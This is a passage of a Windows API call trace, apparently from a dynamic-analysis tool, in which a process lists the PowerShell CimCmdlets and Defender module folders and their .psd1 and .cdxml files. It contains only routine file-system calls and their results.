nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0226.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.111] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.111] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0226.111] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", lpFilePart=0x0) returned 0x3e [0226.111] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.111] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.111] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0226.112] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0226.112] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.112] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0226.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.112] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0226.112] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0226.112] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.113] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.113] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0226.113] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0226.113] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0226.113] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0226.114] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0226.151] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0226.151] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0226.151] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0226.151] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0226.151] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 0 [0226.151] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.152] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0226.152] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0226.152] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.152] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0226.153] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0226.154] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.154] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.154] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0226.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.154] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.154] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0226.154] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0226.155] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.155] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.155] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0226.155] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0226.155] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0226.156] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0226.156] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0226.156] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, 